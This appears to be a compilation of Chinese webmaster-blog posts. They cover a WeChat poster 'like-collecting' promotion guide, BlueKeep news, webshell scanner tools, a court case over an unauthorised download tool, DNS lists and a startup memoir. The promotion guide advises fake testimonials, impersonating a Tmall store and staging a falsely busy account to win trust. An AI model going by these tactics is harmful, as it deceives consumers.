天天被各种二维码海报刷爆朋友圈。你去扫码领奖,结果被带到一个微信群里,客服妹子告诉你必须转发海报到朋友圈,然后截图通过审核才能领取奖品。很好的套路,现在被wx封的亲妈都不认识了。 而且我要告诉你,活码裂变需要购买软件系统,需要强大的客服团队支持。因为此方法转发+截图就能获奖,所以节奏十分快,回复问题稍微慢一点,裂变效果就会大打折扣。虽然不是人人都能做起来,但依然不失为一个好的引流方法。 6、短视频引流 借助短视频高曝光率,然后在签名或者视频内容中植入广告来进行引流。小白心态都比较差,让他走心天天发各种原创、伪原创视频,结果一星期都不见得爆一条,的确很打击自信心。 我说的这些,并不是否定上述那些引流方法,只因它们都有一定局限性,并不是人人都能操作的来。 那么有没有一种无需脚本、无需技术、无需各种苦逼复杂操作、手机上就能信手拈来的引流方法呢? 生活中从不缺少美,而是缺少发现美的眼睛。 你平时转发一些让人扫码、关注、转发、注册、下载的内容,从来没有人鸟你,让你怀疑自己是不是没朋友,或者玩了一个假微信。 大家也接触过不少转发集赞的朋友圈,但是你有没有注意到它的高曝光率和令人惊喜的效果? 之前与粉丝的互动测试 所以我们完全可以合并集赞+活码海报引流方法,让它变成一种轻量级的集赞海报裂变。这并不是老李的纸上谈兵,因为的确有人在操作了,而且效果还是不错的。 集赞海报裂变优势: 对比那些强制拉人头活动,此方法极其简单。粉丝只要让朋友顺水人情点个赞即可,无需强求朋友扫码关注下载转发,极大节省了时间与沟通成本,更无须担心信息安全或隐私泄露等问题。 而且对比传统活码裂变,集赞能从根本上杜绝转发设置分组、0朋友小号转发、转完立即删除等作弊手段,可以把曝光度、参与度、留存度最大限度发挥出来。 同时,简单一张海报,落地是你的微信号,无需任何引流软件支持,也没有任何活码中间页或图文链接,抗封杀能力极强! 集赞海报裂变步骤: 1、奖品挑选 奖品必须设置,而且要真实发放。耍小聪明的后果,就是你无法与客户建立信任,甚至导致裂变流产。 选择奖品的时候,我们要注意三要素:价格适中、受众广、与自己的产品有相关度。 先说价格。这里不能太便宜让人没兴趣参与,也不能太贵超出自己的承受能力。建议使用售价30-60之间的淘客产品(土豪可以追加成本),这样不但用户觉得价值高,而且你可以用优惠券和佣金抵消掉一半以上的金额。 有人问能否使用自己的产品,老李觉得这里你自己看着来。如果你的产品受众较窄、知名度过低,那么在用户心中就很难建立等价关系(不知道它值多少钱)。结果就是你送的肉疼,粉丝却不买账。 然后说受众。你送一个精美的玩偶,或是两提本色卫生纸,就比你去送宝宝尿垫好得多;但凡能选择三只松鼠零食礼包,就不要去用“阿猫阿狗”全家桶作为礼品。 当然世事无绝对,因为还要考虑到产品相关性这个维度。比如你是卖母婴品的,只想吸引新生儿宝妈粉,那么送尿不湿反而是一个绝佳选择。但是如果你想去定向吸引高度垂直的粉丝,就要考虑到另外一个问题:受众过窄,会导致你无法裂变,或者在有很大起始流量的前提下才能裂变。 如果我们想吸粉做淘客,垂直度卡在“网购粉”足矣,从淘宝选礼品也是最佳方案;你是卖茶叶卖自酿酒的,就去搞定中年大叔,直接送产品即可;你做餐饮店,自然要送堂食套餐,吸引本地吃货加你然后进店消费。 所以不要连需求都没搞清,就天天喊“我要引宝妈粉”或者“我要爆粉”,这会显得你很low b,没有半点思考能力。 2、制作海报 推荐使用海报工厂app。当然如果你有更好的app,或者你是ps大神,就请忽略。 海报通常需要涵盖的元素有:标题(集赞送三只松鼠大礼包!)、副标题(可选)、产品图(无水印+清晰+简单内容介绍)、活动限期限量(例如截止6月20日、限量200份,以增加紧迫感)、参与流程(转发海报至朋友圈,集赞xx个即可领取,详情扫码咨询)、微信二维码。 海报注意色彩和布局搭配,不要搞的粗制滥造,不要弄大红配翠绿,让人看了就觉得山寨没有扫码欲望。这里建议大家多去参考行业案例或者海报素材库。 3、设置文案与流程 不要认为只发了海报就万事大吉了,活动过程中需要用到各种文案和话术。例如转发海报附带一句:是真的,我已经领到了!还有在粉丝咨询活动时,回答要专业、热情,不要冷冰冰爱答不理。记得提前把各种可能的问题整理成标准话术,这样可以提高效率。 设置文案话术时要学会借势。你说自己是某天猫店客服搞活动,效果就好于说你个人在做活动。 活动集赞数量,针对产品价值分别设置38、58、88即可(自己微调不必严格照搬),不要太低或太高,低了你承受不起,高了粉丝没有参与的欲望。 4、微信号包装 客服微信的展示面十分重要!一个二次元头像、撞脸美女头像、宝妈抱baby头像,看起来假到掉渣啊!粉丝加你好友后,会有极大概率翻你的朋友圈。如果你的圈里充满了各种花边新闻、炫颜值炫爹妈炫大排档,要么就是趣头条拼多多拉人头,试问谁敢相信你活动的真实性? 兵马未动,粮草先行。务必准备一个干净的微信小号,换上标准的客服/品牌头像,朋友圈多发一些活动说明、领奖答谢对话截图,再穿插上发货、办公室忙碌的照片等等,营造出活动火爆的氛围。 再说几句:过程一定要简单,话术清晰明了不拖泥带水。引来粉丝要注意留存转化,最好趁热打铁,在领奖后马上安利你自己的产品。起始粉丝量过少的人,可能无法有效完成裂变,要尽可能打电话给好友让他们协助转发。 篇幅有限,其余细节大家自行去摸索。 祝各位周末愉快!   #### 几乎一半运行Windows的互联网医疗设备容易受到BlueKeep漏洞攻击 2月19日 消息:与医院网络上的其他设备相比,联网医疗设备受到BlueKeep攻击的可能性是前者的两倍,这让患者和员工面临着额外的网络攻击风险。尤其令人担忧的是,医疗保健已经成为黑客攻击的一个热门目标。 据悉,BlueKeep是去年发现的微软远程桌面协议(RDP)服务的一个漏洞,影响Windows 7、Windows Server 2008 R2 和Windows Server 2008。 医疗网络安全公司CyberMDX的研究人员最新发布的一份报告显示,一家普通医院中,有22%的Windows设备都受在BlueKeep漏洞的影响,因为设备没有收到相关的补丁。当涉及到运行在Windows上的联网医疗设备时,这个数字上升到45%,这意味着几乎一半的设备是易受攻击的。医院网络上的连接设备包括放射设备、监视器、x射线和超声波设备、麻醉仪器等。如果这些设备没有安装补丁,搜索易受BlueKeep攻击的机器的破坏性网络攻击可能会让医院网络和病人处于危险之中。 报道还称,医院面临的一个关键问题是,许多设备被归类为过时的:例如,Windows7 容易受到BlueKeep的攻击,而且不再得到微软的支持,但在医院网络中仍然很常见。Windows7 和其他不受支持的操作系统中发现的任何进一步的漏洞都不能保证是安全补丁,这可能会让网络面临进一步的风险。 #### 几款有效WebShell病毒扫描检测查杀工具 webshell是一种可以在web服务器上执行后台脚本或者命令的后门,黑客通过入侵网站上传webshell后获得服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。而WebShell扫描检测工具可辅助查出该后门。 WebShell扫描工具适用 网上下载的源码 特定文件检测是否是木马 检测目标程序或文件是否存在后门 免杀检测识别率测试 D盾 防火墙 阿D出品,免费,GUI,WebShell扫描检测查杀 D盾查杀 功能特性简介 支持系统:win2003/win2008/win2012/win2016 PHP支持:FastCGI/ISAPI (版本:5.x至7.x) 一句话免疫,WebShell扫描查杀,主动后门拦截,SESSION保护,防WEB嗅探,防CC,防篡改,注入防御,防XSS,防提权,上传防御,未知0day防御,异 形脚本防御等等。 防止黑客入侵和提权,让服务器更安全。 『目录限制』 有效防止入侵者通过脚本上传危险程序或代码,让服务运行于安全状态。 『执行限制』 防范入侵者执行危险程序,防范提权的发生。 『网络限制』 禁止脚本连接本机的危险端口,如常见的Serv-U提权端口,防范通过第三方软件的网络端口进行提 权 禁止UDP向外发送,可有效防范UDP的DDOS攻击,如PHPDDOS等,有效限制网络带宽给恶意占用 『组件限制』 禁止危险的组件,让服务器更安全。 『.net安全』 去除 .net 一些危险基因,让服务器更安全! 『注入防御』 防范因网站有注入问题导致服务器给入侵。 『3389防御』 防范黑客未经许可登陆你的3389,让服务器更安全! 『防CC攻击』 让网站免受CC攻击困扰! 『禁止下载某文件类型』 防止不该给下载的文件给下载,防止信息外露! 『允许执行的脚本扩展名』 有效的防止未经允许的扩展名脚本恶意执行,如:CER,CDX 等扩展名的木马。或是 /1.asp/1.gif 等会执行的情况 『禁止如下目录执行脚本』 防止图片和上传等可写目录执行脚本 『防范工具扫描网站目录和文件信息』 让入侵者不容易知道你的网站结构 『防范MSSQL数据库错误信息反馈暴露表或数据信息』 防范信息暴露。 WEBDIR+ 百度WebShell扫描检测引擎 百度OpenRASP团队,推出的一款WebShell检测引擎,免费,Shell在线检测查杀 WEBDIR+ WebShell检测引擎 支持的文件类有 php, phtml, inc, php3, php4, php5, war, jsp, jspx, asp, aspx, cer, cdx, asa, ashx, asmx, cfm 支持的压缩包有 rar, zip, tar, xz, tbz, tgz, tbz2, bz2, gz 上传后的文件或者压缩包,会经过WEBDIR+三种引擎的扫描检测,检测后文件会被立即删除,全程无人工介入。传统的正则表达式方式,存在高误报、低查杀率的问题,WEBDIR+采用先进的动态监测技术,结合多种引擎零规则查杀 WebShellkiller webshell后门扫描检测工具 免费,GUI Webshell扫描检测查杀 WebShellkiller WebShellkiller作为一款web后门专杀工具,不仅支持webshell扫描,同时还支持暗链的扫描。这是一款融合了多重检测引擎的查杀工具。在传统正则匹配的基础上,采用模拟执行,参数动态分析监测技术、webshell语义分析技术、暗链隐藏特征分析技术,并根据webshell的行为模式构建了基于机器学习的智能检测模型。传统技术与人工智能技术相结合、静态扫描和动态分析相结合,更精准地检测出WEB网站已知和未知的后门文件。 软件特性 多维度检测技术 全面精确的暗链检测技术 快速定位处理文件 一键导出报表 一键上传样本 用户自定义敏感词的暗链检测 WEBSHELL.PUB 专注查杀 免费,GUI/在线WebShell扫描检测查杀 shellpub webshell查杀 也称河马查杀,拥有海量webshell样本和自主查杀技术,采用传统特征+云端大数据双引擎的查杀技术。查杀速度快、精度高、误报低,形成科学查杀鉴定标准,可对同行产品进行查杀能力测评。 CloudWalker(牧云) 一个可执行的命令行版本 Webshell 检测工具。目前,项目已停止更新。 兼容性,提供linux版本,Windows 暂不支持。 在线查杀demo:https://webshellchop.chaitin.cn/ github项目地址:https://github.com/chaitin/cloudwalker   还有如宝塔面板后台都有提供查杀WebShell的插件,大家可以看下。   #### 凤凰新闻被约谈,凤凰新闻App和手机凤凰网遭停顿整改 9月26日消息,今天下午凤凰新闻客户端App、手机凤凰网在其首页上发布公告,他们将依照有关部门整改要求于2018年09月26日15:00至10月10日15:00停止更新,并全面进行整改。凤凰新闻App和手机凤凰网停更整改半个月    凤凰网依据有关部门约谈要求,针对部分频道、“凤凰新闻”客户端及WAP网站传播违法不良信息、歪曲篡改新闻标题原意、违规转载新闻信息等问题,进行深刻检讨和反思,认真落实各项管理要求,深入自查自纠,全面加强网站业务和人员管理,将严格按照整改通知,立即深入进行整改,整改期间停止更新凤凰新闻客户端App、手机凤凰网及相关频道,同时,一如既往地欢迎用户及社会各界对凤凰网进行监督和帮助,我们将以维护网络信息传播秩序为己任,积极营造健康的网络空间。凤凰网资讯频道、财经频道自9月26日15时至10月10日15时停止更新,科技频道自9月26日15时至10月26日15时停止更新;“凤凰新闻”客户端自9月26日15时至10月10日15时停止更新;凤凰WAP网自9月26日15时至10月10日15时停止更新。各位站长小心啦,每年这个时间相关部门都会进行互联网清洗,大家看好自己的网站内容,不要出现违规信息了,主机吧这边有个客户就是因为一些图片过于暴露被通报停了,感觉凉凉了。连凤凰新闻这种国际级别的网站都被停,更别说小站了。 #### 出售百度网盘不限速高速下载神器、获利 42756 元:被判有期徒刑三年 被告人:林某,男,1989年出生,大学文化。 2021年9月至2022年5月,林某从上家购买一款百度网盘不限速高速下载神器软件,命名为“PD急速下载器。exe”,在拼多多店铺为“状元资料阁I”“小西瓜素材站”上予以出售。其间,林某出售共计9118单,违法所得人民币42756元。 经鉴定,林某出售的涉案软件在使用者无需帐号登录的状态下,未经授权以超级用户身份请求百度网盘后台服务器对应的通讯接口,获取带有超级会员不限速标识的直链(文件下载的实际地址)。 案发后,林某已退出违法所得人民币42756元。 法院裁定:法院认为,林某构成提供侵入、非法控制计算机信息系统程序、工具罪。公诉机关的指控成立。林某归案后能如实供述自己的罪行,且已退清违法所得,自愿认罪认罚,有悔罪表现,依法和酌情予以从轻处罚,并适用缓刑。公诉机关提出的量刑建议及辩护人据此要求对其从轻处罚的相关辩护意见,法院均予以采纳。被告人退出的违法所得及涉案物品,依法予以没收。据此,依照《中华人民共和国刑法》第二百八十五条第三款、第二款、第六十七条第三款、第七十二条、第七十三条第二款、第六十四条及《中华人民共和国刑事诉讼法》第十五条之规定,判决如下:1、林某犯提供侵入、非法控制计算机信息系统程序、工具罪,判处有期徒刑三年,缓刑三年,并处罚金人民币30000元(已预缴)。(缓刑考验期限,从判决确定之日起计算。)二、被告人退出的违法所得人民币42756元及涉案物品固态硬盘一个、vivo手机1部,均予以没收。 #### 出版业迎战“谷歌零点击”冲击,积极探索新增长路径 随着人工智能技术的快速演进,出版行业正面临由谷歌AI功能带来的“零点击搜索”(Google Zero)挑战。多家媒体机构高管公开表示,谷歌在搜索结果页直接生成的AI摘要严重削弱了传统外部链接点击量,出版网站的流量可能遭遇进一步下滑。今年7月,该AI工具扩展至英国市场,令许多出版商忧虑 already 不断萎缩的访问数据将加速下跌。 谷歌的新AI模式能够在搜索结果顶部直接提供综合答案,甚至在用户无需点击来源网站的情况下完成内容归纳。Immediate Media首席执行官肖恩・科恩韦尔指出:“我们确实感受到了AI摘要带来的冲击。AI技术正以指数级速度进步,我们必须预见到未来流量可能会出现更大幅度的下降。” Enders Analysis与专业出版协会(PPA)共同发布的报告显示,近一半的出版商在过去一年中搜索流量出现下降。该报告进一步指出,AI生成摘要正在不断侵蚀网站访问量,已有四成用户习惯于依赖“零点击搜索结果”满足信息需求。 多项近期研究证实,当AI摘要出现在谷歌搜索结果页时,用户点击进入原始链接的意愿显著降低。尽管谷歌回应称相关报告“存在根本性方法论缺陷”,并强调其整体流量保持稳定、用户点击质量反而提高,出版业的焦虑并未缓解。 在这一背景下,众多出版商正积极调整战略、开拓新出路。People Inc首席执行官尼尔・沃格尔表示,“谷歌零点击”问题已成为其公司战略的核心考量。该公司此前从Dotdash Meredith更名为People Inc,以进一步聚焦“以人为本”的新闻理念。据他透露,来自谷歌搜索的推荐流量占比已从五年前的65%降至目前的30%。 除了战略转型,出版商也在努力拓宽收入来源。例如通过组织线下活动、会议等方式增强受众参与。Immediate Media的科恩韦尔认为,关键在于通过数字订阅建立起与读者的直接联系,以弥补搜索流量的流失。 另一方面,不少出版集团正推动流量来源的多元化以降低对谷歌的依赖。Reach公司首席执行官皮尔斯・诺斯表示,他们正在积极构建更加平衡的流量渠道组合。同时,越来越多机构正通过社交媒体推送、新闻通讯、以及合作平台如苹果新闻等,寻找新的用户触达和变现机会。 #### 分享一个不错的IP端口在线查询网站 平时服务器故障、网站被攻击、IP被封之类的都需要查询IP端口是否开放或关闭,比如阿里云服务器IP进黑洞后IP的所有端口都是关闭的。 所以查询IP端口也是挺常用的,目前本地电脑可以查询,不过嘛一般win系统都默认关闭查询功能的,而且还要输入口令,麻烦! 软件工具也是可以查,不过软件要下载到电脑,而且还不知道有没有病毒之类的,所以也不好。 那么IP端口在线查询网站是不错的选择,以前主机吧一直是用站长之家的端口查询工具的,结果一直维护,大半年了,也没见开放。 主机吧在网上找了很久,也没见到有能用的在线查询网站,查了几页终于找到了一家不错的查询网站。 http://i.tool.cc/t/ 这网站不只端口查询功能,而且很多站站长实用的功能都有,主机吧试了下非常好用,速度挺快的,推荐大家使用。 要知道现在站长群体已经很少了,导致国内站长相关的工具基本都倒闭了,比如比较出名的站长帮手网站,也是倒闭了,所以有好的站长工具网站大家要支持下哦。 #### 分享一些全球靠谱的免费公用DNS DNS在平时上网中扮演重要角色,不好用的DNS可能会导致网速慢、弹窗广告、网址打不开、打开不是自己想要的网站、劫持等一系列问题。特别是搞网站的,好的本地DNS很重要。 针对DNS的问题,主机吧从网上搜罗了一些靠谱的免费公用DNS供大家选择。 国内常用公共DNS 一、114DNS(https://www.114dns.com/) 老牌的DNS解析服务了,以前经常用,电信联通移动,全国通用DNS,分的种类也较多,根据需要选择。 纯净无劫持,无需再忍受被强扭去看广告或粗俗网站之痛苦: 114.114.114.114 114.114.115.115 拦截钓鱼病毒木马网站,增强网银、证券、购物、游戏、隐私信息安全: 114.114.114.119 114.114.115.119 学校或家长可选,拦截色情网站,保护少年儿童免受网络色情内容的毒害 114.114.114.110 114.114.115.110 二、阿里DNS(http://www.alidns.com/) 阿里DNS是阿里巴巴集团推出的DNS递归解析系统,面向互联网用户提供快速、稳定、智能的免费DNS递归解析服务,现在我也经常使用。 223.5.5.5 223.6.6.6 三、SDNS(http://www.sdns.cn/) SDNS是由中国互联网络信息中心(CNNIC)与国内外电信运营商合作推出的免费公共云解析服务(SecureDNS,简称SDNS),旨在为用户提供高速、安全、智能的上网接入解析服务。 这两周使用114和阿里DNS都碰到了广告挟持的问题,换成SDNS后解决,正在使用。 1.2.4.8;210.2.4.8 四、中科大的DNS 据一些网友反映:无污染、速度快。我是才知道,还没用过,不过考虑到中科大的教育性质和有名的Ubuntu源的速度,应该可用。 202.38.64.1 202.112.20.131 202.141.160.95 202.141.160.99 202.141.176.95 202.141.176.99 五、OneDNS(http://www.onedns.net/) 创立于2013年的DNS服务,比较新,没使用过,不过他们的口号挺吸引人:OneDNS是一个安全、快速、免费的小众DNS服务。通过它,您可以时刻畅享来自云端的恶意网站屏蔽服务,彻底摆脱无良ISP的DNS污染与劫持,同时,横跨南北的高速线路加速您的网络连接。 112.124.47.27 南方首选/北方备用 114.215.126.16 北方首选/南方备用 六、DNS派(http://www.dnspai.com/) 360的合作伙伴,口号:让网上冲浪更加稳定、快速、安全;为家庭拦截钓鱼网站,过滤非法网站,建立一个绿色健康的网上环境;为域名拼写自动纠错,让上网更方便。没使用过,不过看这口号没太大吸引力。 电信:首选地址:101.226.4.6, 备用地址:218.30.118.6 联通:首选地址:123.125.81.6,备用地址:140.207.198.6 移动:首选地址:101.226.4.6, 备用地址:218.30.118.6 铁通:首选地址:101.226.4.6, 备用地址:218.30.118.6 港澳台地区 台湾网络资讯中心 TWNIC Quad 101 DNS(主DNS:101.101.101.101;备用:101.102.103.104) IPv6部分:主DNS:2001:de4::101;备用:2001:de4::102 香港宽频DNS(203.80.96.10;203.80.96.9) 中国(香港)电信全球有限公司NS1(202.55.11.100 )测试未 ping 通 中国(香港)电信全球有限公司NS4(202.55.21.85)ping 在90左右 西门子菠菜服务器(香港)(112.121.178.187)ping 在50左右 中国台湾中华电信 HiNet DNS(168.95.192.1;  168.95.1.1) 和记黄埔有限公司(202.45.84.58) 国外公用DNS IBM 的 9.9.9.9 IBM 的 DNS 服务器 9.9.9.9主打防止恶意网站以及钓鱼网站。但是就速度来说,国内访问可能不是很理想。 Google 的 8.8.8.8 / 8.8.4.4 这恐怕是最知名的 DNS 服务器之一了,这个 DNS 服务器一直以稳定著称,在国外的用户建议使用。 OpenDNS OpenDNS 有四个 DNS 服务器地址:(粗体为主要地址) OpenDNS同样也是一款老牌 DNS 提供商,可惜的是同样,这款 DNS 在国内也没有服务器,导致访问速度也不理想。 诺顿 DNS 诺顿 DNS 有三个类型: 诺顿在安全界的大名相信大家都有所耳闻,这款 DNS 在安全方面也有不俗的表现。如果您在国外且对安全有要求的话可以尝试。     #### 分享个人创业的经历 在写下这一篇创业路途的真实实录时,我23岁,还有小半年就又过生日了。 或许在父母辈看来,或者还包括一些在社会上已经摸爬滚打一段时间,看似年长一些且自我感觉良好的“前辈”看来,都会觉得23岁,90后的娃娃,还太小了,谈什么创业。 但无论如何,我都想将这一段经历写下来,90后是否适合创业,我又是如何创业的,我的几次成功,几次失败,这笔来之不易的经历,实乃我24岁生日前给予我自己最好的礼物。 在说创业经历之前,我想对正在创业,或者即将要创业的同行者们问一句话:“在这个越来越‘糜烂’和‘腐败’的创业大环境下,你创业究竟是为了什么?” “金钱?” “地位?” “荣誉?” “还是随波逐流?” 其实我真正想问的是:“是否还记得,自己最初想创业时的那份心情呢?” —— 要说起创业这件事的话,首先也得从自身的经历说起。 从小我就是个不安分的主,别人上学认真学习,我在逃课网吧玩游戏。别人专心备考冲大学,我 在组团揣摩咋作弊。别人是大学社团学生会图书馆,我是社会商业创业者沙龙会—— 哦,对,短短几句话,切入正题了。 创业。 2010年,我高三毕业,在所有人喜庆洋洋的庆祝终于解放了的时候,我已经在关注网络的发展。 那时候,个人网站主刚刚兴起,一片大好形势。 应该说是出生牛犊不怕虎吧,我找了两个朋友,筹资了近一万元,创建了一个自己的游戏网站, 创业的路途就从此开始,且一发不可收拾。 2010年的那个时候,互联网才刚刚兴起到网络站长这一阶层,三大门户网站还是巨头,阿里巴巴还没这么辉煌,微信也没这么风靡,百度也只不过是个搜索引擎,杀毒软件还是收费的居多。 我作为一名完全的小白,一头就扎了进去。 结果可想而知,不懂运营,不懂技术,不懂产品,不懂营销,凭着一腔热血,注定是失败的。 那个时候,索性我们也够拼,或者说,是我够拼。 因为其他的伙伴听说创业也是心血来潮,并不了解,输赢无所谓。 可我曾经真的很认真希望将它做好,做下去,虽然当时我对事业,责任感这一回事还不是很了解,但我知道有些事情,既然开始做了,你身上就有一份责任,不到最后,总不要甩手不干的好。 我开始去各个地方去找人,找孩子,找父母,找年轻人,找其他的公司合作,虽然我当时还不知 道究竟该怎么合作,但我就是要让自己去碰壁的。 想想自己当时还真是认真的有些可爱。 那时候,我只不过刚刚高三毕业。 后来找到了一家团购网站合作入驻游戏平台,约定五五分成,通过宣传高龄的圈子,姐姐辈的圈 子,引进了一批团购服装来卖,才收回了一半的成本。 这个时候,我已经走在大学校园里了。 第一次创业,就这么简单的以失败告终,我遭到了前所未有的打击。 我相信每一个创业的人都知道,你开始做这个事情的时候,所有人都对你是不好看的,尤其在当时的那个时间段还没有现在创业大潮这么火热,他们会说你不学无术,不思进取,尽搞些稀奇古怪的东西。 最后,果然如他们想象的,你终于失败了,你会看到更多的“趾高气扬”的面孔,他们的表情会告诉你:“你看吧,就说了你不要瞎搞,搞来搞去也就这么点出息。” 我当时18岁,可我并不因此感到沮丧和颓败,我依稀从这样的言论和表情里,看到了我自己和别人不一样的东西。 追求。 人生最大的失败,不是失败本身,而是,我本可以。 我自己虽然很模糊,但其实我心底里知道,我要的并不是赚多少钱,而是另外的东西。 不过,我也很感兴趣这一次的创业,让我对这一条路途越发的沉迷和执着,但当时我还不知道我在沉迷和执着的这种东西究竟是什么。 哦,对了,我读的大学在成都,现在也在成都。 学校的名字我就不说了,避免给学校丢脸。由于学的专业是我非常不喜欢的医学类,我十分懊恼。 (其实就算是喜欢的我也不一定能在课堂里呆得住) 大学开始,大家在上课,学习,社团等等,我开始频繁的去做兼职,赚钱,认识各种各样的人,接触各种各样的事情,很多非比寻常,很多稀里古怪。 我大一整一个阶段,基本上可以说是在社会上各种能走的“小角落”完全独自走过来的,酒吧酒保,送餐员,快递员,销售员,安保,批发,等等等等。 课没上过几节,老是被批,但我乐此不疲。 在这个过程当中,我有着很深的几点感触,是很希望和大家分享的: 第一, 一个人的真实能力,和他是不是能说能侃,完全是两码子事。 第二, 如果你想要知道一个人是否真的有硬实力,有真才实学,别相信他说的天花乱坠那一套,你得看他背后的故事,看他到底干过什么。 (1. 语言是最虚的东西,尤其是一个人想骗人的时候。) (2. 不要以为你自己有多牛X,能够有怎样丰富的阅历能瞬间看清一个人,那TMD都是扯淡,你绝对想不到一个和你走南闯北的兄弟最后会因为利益反咬你一口,难道那个时候你会告诉自己,你曾经眼瞎了?) (3. 所以,想要真正的了解一个人,他的故事,他的能力,他的力量,不要听他说的,得看他做的,换言之,只有一样工具可以做到,就是时间。) 第三, 一个人,尤其是男人,抽烟喝酒这东西,你总得沾一样,因为在这个大环境下,这是你和他人沟通交流最为顺畅和直接的方式。 (我们总是听到别人说,别抽烟,别喝酒,伤身伤肾伤肺各种伤,这其实都是很正确的。但我必须要打击你一下,你回想回想,和你说这些话的人,都是些什么样的人呢?) 1. 边劝着你不要抽烟喝酒,但是抽烟喝酒起来谁都挡不住。 2. 他们曾经疯狂过,曾经迷醉过,曾经嗜醉酒场,狂吐烟圈过,曾经失败过,曾经迷茫过,到了如今事业有成,万事俱妥,才开始戒烟戒酒的,你现在就开始谈这个,太早了点吧。 3. 有的时候,这是伪装,但也是武器,因为你没有办法,你必须拿起这样的武器来“武装”自己向前走,到底能走多远,取决于你的弹药,而非武器本身。 哦,回归正题。 接下来的路途还比较顺利,也没什么可说的,因为一个吉他表演还有自己爽快的性格,空降了学生会,成了干部。也成为了区域性老乡组织的主席,办了一场规模不小的晚会,算是在圈子里混得还不错了。 最值得一提的是,在这个时间段里,我有幸了解了猪八戒网,并且参与了近两个月,成为了猪八戒网的网络推广员,也就是在最初的创办网站之后,再一次接触到了互联网的行业。 (如果那个时候知道猪八戒网如今能融资这么高,打死也要继续混进去啊,哈哈!) 大三开始,不安分的我,又打算开始自己的创业路,这一次,和几个老乡朋友一起,在学校旁边的学生小镇上开起了家乡菜系的饭店。 从筹资,谈判,装修,布置,筹备 ,找厨师,到饭店真正落成,太多的不容易。 饭店建成之后,碰到的问题非常之多,大到资金的问题,整体风格的问题,小到每天谁去买菜,谁来布置桌椅,谁来关门等等,都是问题。 三个月的时间,几乎天天起早贪黑,课也没法上,几天不洗澡,那也都是小事。 关键是有同学朋友来照顾生意,你还得陪酒,你还得陪聊,最重要的是你明明已经很累了,很困了,却还是得硬撑着,不能让人看出来。 那时候不像现在是一条单身汪,还是有女朋友的,天天吵,夜夜吵,理解也吵,不理解也吵,满腹的委屈,诸多的不易,也只能自己咽下去。 想想也是,男人嘛,过了就过了,只是其实委屈了她。 很多人说我酒量好,千杯不醉,万杯不倒。 放你丫的屁,连续喝一个月,天天喝天天多,虚的时候,吐的时候,谁能看到,也就差没撞墙把 自己撞傻了才能被人看出来。 当然,后来我们的成绩还不错,当时几乎算是成了承包学校大小聚会的聚集地。 只可惜好景不长,由于团队内部的特殊原因,我就不细说了。 只能说,这一次的创业之路,在情势最好的情况下,依然还是以失败告终。 亏的不仅仅是钱,还是人。 这个例子其实很好的告诉大家,也告诉我自己。 创业创业,首先你得有创业的心态,能吃苦,能坚持,最重要的是,团队!团队!团队! 重要的事情说三遍! 团队非常的重要! 到底有多重要,创业者都知道的,我就不说了。 一个项目的成功,成也团队,败也团队。 一个人是不可能有多大的拼头的,小打小闹还行,但你要想上台阶,非团队不行! 接下来的时间,我沉下心来看书,关于互联网,关于管理,关于创业,关于金融,也在即将进入大四的这一个时间段,写了两部玄幻小说,加起来将近百万字吧。 现在还时不时的更新一下,群里的书友天天骂我不更新,拖更,断更,就差没有来家里砍人了,哈哈。 所以这也是我经常不上扣扣的原因,惹不起我还躲不起嘛。 其实不是不坚持,而是我开始出发去参加各种各样的峰会,路演,论坛会等等,这一段时间的学习,我已经很明确的知道我想要做的事情,就是在互联网的方向,这也是我最熟悉和在行的,论思维的跳跃性和活跃性,以及新鲜事物的接收和整理程度,我是有绝对的自信的。 换句话说,就是人们所谓的”互联网思维“。 然而经历了很多的人和事,以及很多的建议,我知道我还需要更多的学习,于是听取了一位投资人的意见,我到了另外的一个城市,在一家互联网o2o公司学习,也正是在这个地方,我遇见了我现在的合伙人和团队。 我一直很感谢这一次的经历,虽然它并不那么美好,可对于我来说,结果太棒了! 公司怎么样我就不说了,总之,在我印象中,自由,和谐,透明,诚信,这样的词汇,很难与其联系在一起。 而我这个人做事情,诚信绝对是第一位的,是什么就是什么,一即是一,二即是二,违背个人初心和原则的事情,就算拿鞭子抽我,我也不做。 尤其是圈钱上市,资本市场,做假数据这种做法,我是高度反感的。 所以我离开了。 但和我一起离开的,是一个团队。 直到现在。 我这个人,大的能力没有,但我知道在我身边的每一个人最需要什么,我真心待他们,他们也真心待我。 所以我有很多兄弟姐妹,真心的朋友。 一个熟悉的投资人和我说过,我只要保证初心不变,一定能成。 有人说我有凝聚力,能拉拢人心,我想说,我用心换心,何来“拉”之一说? 我始终会强调,我现在是创始人,我的用户,并不是产品的用户,那是公司里的伙伴们的用户。 我的用户是我的公司员工,那些和我一起并肩作战,从未离去的人。 我会尽我所能的把我觉得最好的福利给予他们,让他们走出去能堂堂正正的说,我们是MT的人。 因为只有你真正的和你身边的人,你的伙伴,你的员工,你的用户,去交心,去成为朋友,去听取他的意见和建议,你不成功,谁成功? 我想想,倒也是。 哈哈,我是一个在路边都愿意和乞丐去聊天的人,无论是十年二十年之后,无论我经历了多少, 我依然还是这样。 我不成功,谁成功? —— 说回我的团队。 我们志同道合,我们真心的想做一件产品,不弄虚作假,不颠倒黑白,不搞圈钱上市的把戏,只 想认认真真,专注专精的做好产品,做好细节,做好服务。 只要我是创始人的一天,团队的这个宗旨和初心就绝不会改变。 直到此刻,我才真正的了解,当初我想要的那种“东西”究竟是什么。 是帮助。 是服务。 是分享和支持。 是在这条路上认识的那些人和事,是激情和活力。 这些东西让我着迷,让我的心和身体永远不会停下。 我会一直在路上。 —— 一件真正好的产品,其核心一定是解决了社会问题当中的某一痛点,非常痛的点,只有在这个前提下,服务才能跟进,产品才能得以持续性的生存,给予用户最大的支持和帮助,企业才能长久。 然而,看看现在的大环境下,所谓的“大众创业,万众创新”都成了什么样了? 创业者为圈钱骗钱都疯了,商业计划书满天飞,全是O2O,其实你现在让一个创始人出来真正讲 讲o2o的本质,它解决的问题,都不一定比我说的好。 虽然我不是做这个方向的。 投资人也怕了,心力交瘁。 这是我听一位投资人亲口说的,为什么90后创业者不靠谱。 他投资的一个90后创始人的公司,在拿到他300万投资之后,三个月之内完全花完,再找他要钱,他就被震惊到了。 怎么可能! 这家公司的模式,按照他的估算,这笔钱足够支持半年的时间。 最后了解才知道,这几个创业的90后,拿到钱之后,整个人就懵了,飘飘然起来,纸醉金迷,买了两辆车,公司搬到最好的办公地点,天天吹嘘拿到投资了,朋友圈和宣传,都是如何如何拿多少投资,什么样的策略能更好的让投资人投钱云云。 我一听,也感到汗颜。 大众说90后不踏实,可能也在这一点。 